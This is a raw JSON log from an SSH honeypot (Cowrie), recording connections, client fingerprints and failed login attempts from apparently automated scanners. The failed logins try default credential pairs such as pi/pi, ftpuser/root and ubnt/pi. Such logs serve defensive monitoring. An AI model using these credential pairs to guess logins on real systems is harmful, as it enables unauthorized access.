{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.274029Z","src_ip":"212.227.125.160","session":"e397cf0ecf04"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.284032Z","src_ip":"212.227.125.160","session":"0c33a99ad8ee"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.284855Z","src_ip":"212.227.125.160","session":"0c33a99ad8ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.311944Z","src_ip":"212.227.125.160","session":"44e8cca8a8a9"}
{"eventid":"cowrie.login.failed","username":"kipt","password":"kipt","message":"login attempt [kipt/kipt] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:22.468837Z","src_ip":"212.227.125.160","session":"44e8cca8a8a9"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root","message":"login attempt [ftpuser/root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.099821Z","src_ip":"212.227.125.160","session":"e397cf0ecf04"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root","message":"login attempt [ftpuser/root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.153364Z","src_ip":"212.227.125.160","session":"c1fd093392a4"}
{"eventid":"cowrie.login.failed","username":"student","password":"root","message":"login attempt [student/root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.164866Z","src_ip":"212.227.125.160","session":"e890dd8405a5"}
{"eventid":"cowrie.login.failed","username":"noc","password":"root","message":"login attempt [noc/root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.217417Z","src_ip":"212.227.125.160","session":"aa119c2c24b2"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":60266,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad5cb4fc43ee","protocol":"ssh","message":"New connection: 83.168.105.65:60266 (1.2.3.4:22) [session: ad5cb4fc43ee]","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.218566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.219586Z","src_ip":"83.168.105.65","session":"ad5cb4fc43ee"}
{"eventid":"cowrie.login.failed","username":"pi","password":"root","message":"login attempt [pi/root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.224247Z","src_ip":"212.227.125.160","session":"1e6b5bc86fef"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"root","message":"login attempt [ubnt/root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.249293Z","src_ip":"212.227.125.160","session":"0c33a99ad8ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.256869Z","src_ip":"83.168.105.65","session":"ad5cb4fc43ee"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.370430Z","src_ip":"83.168.105.65","session":"ad5cb4fc43ee"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:23.521769Z","src_ip":"212.227.125.160","session":"44e8cca8a8a9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.144460Z","src_ip":"212.227.125.160","session":"e397cf0ecf04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53790,"dst_ip":"1.2.3.4","dst_port":22,"session":"601e0147b6cb","protocol":"ssh","message":"New connection: 212.227.125.160:53790 (1.2.3.4:22) [session: 601e0147b6cb]","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.185714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.186590Z","src_ip":"212.227.125.160","session":"601e0147b6cb"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.196774Z","src_ip":"212.227.125.160","session":"c1fd093392a4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.207946Z","src_ip":"212.227.125.160","session":"e890dd8405a5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.228999Z","src_ip":"212.227.125.160","session":"601e0147b6cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53806,"dst_ip":"1.2.3.4","dst_port":22,"session":"13cb4d70f9de","protocol":"ssh","message":"New connection: 212.227.125.160:53806 (1.2.3.4:22) [session: 13cb4d70f9de]","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.238135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.238913Z","src_ip":"212.227.125.160","session":"13cb4d70f9de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53822,"dst_ip":"1.2.3.4","dst_port":22,"session":"39b701760413","protocol":"ssh","message":"New connection: 212.227.125.160:53822 (1.2.3.4:22) [session: 39b701760413]","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.250103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.251086Z","src_ip":"212.227.125.160","session":"39b701760413"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.261149Z","src_ip":"212.227.125.160","session":"aa119c2c24b2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.266988Z","src_ip":"212.227.125.160","session":"1e6b5bc86fef"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.281381Z","src_ip":"212.227.125.160","session":"13cb4d70f9de"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.294261Z","src_ip":"212.227.125.160","session":"0c33a99ad8ee"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.295219Z","src_ip":"212.227.125.160","session":"39b701760413"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53840,"dst_ip":"1.2.3.4","dst_port":22,"session":"137a9f7c1dd3","protocol":"ssh","message":"New connection: 212.227.125.160:53840 (1.2.3.4:22) [session: 137a9f7c1dd3]","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.310696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.313060Z","src_ip":"212.227.125.160","session":"137a9f7c1dd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53852,"dst_ip":"1.2.3.4","dst_port":22,"session":"355b6e6df0b1","protocol":"ssh","message":"New connection: 212.227.125.160:53852 (1.2.3.4:22) [session: 355b6e6df0b1]","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.337382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.338149Z","src_ip":"212.227.125.160","session":"355b6e6df0b1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.353526Z","src_ip":"212.227.125.160","session":"137a9f7c1dd3"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"pi","message":"login attempt [ftpuser/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.358531Z","src_ip":"212.227.125.160","session":"601e0147b6cb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.383239Z","src_ip":"212.227.125.160","session":"355b6e6df0b1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.408542Z","src_ip":"83.168.105.65","session":"ad5cb4fc43ee"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"pi","message":"login attempt [ftpuser/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.410346Z","src_ip":"212.227.125.160","session":"13cb4d70f9de"}
{"eventid":"cowrie.login.failed","username":"student","password":"pi","message":"login attempt [student/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.425492Z","src_ip":"212.227.125.160","session":"39b701760413"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"pi","message":"login attempt [ubnt/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.513522Z","src_ip":"212.227.125.160","session":"355b6e6df0b1"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:24.523421Z","src_ip":"212.227.125.160","session":"137a9f7c1dd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53832,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa5053822c15","protocol":"ssh","message":"New connection: 212.227.125.160:53832 (1.2.3.4:22) [session: fa5053822c15]","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.303940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.306443Z","src_ip":"212.227.125.160","session":"fa5053822c15"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.346787Z","src_ip":"212.227.125.160","session":"fa5053822c15"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.402372Z","src_ip":"212.227.125.160","session":"601e0147b6cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53866,"dst_ip":"1.2.3.4","dst_port":22,"session":"f339561b89ba","protocol":"ssh","message":"New connection: 212.227.125.160:53866 (1.2.3.4:22) [session: f339561b89ba]","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.444556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.445375Z","src_ip":"212.227.125.160","session":"f339561b89ba"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.455574Z","src_ip":"212.227.125.160","session":"13cb4d70f9de"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.469915Z","src_ip":"212.227.125.160","session":"39b701760413"}
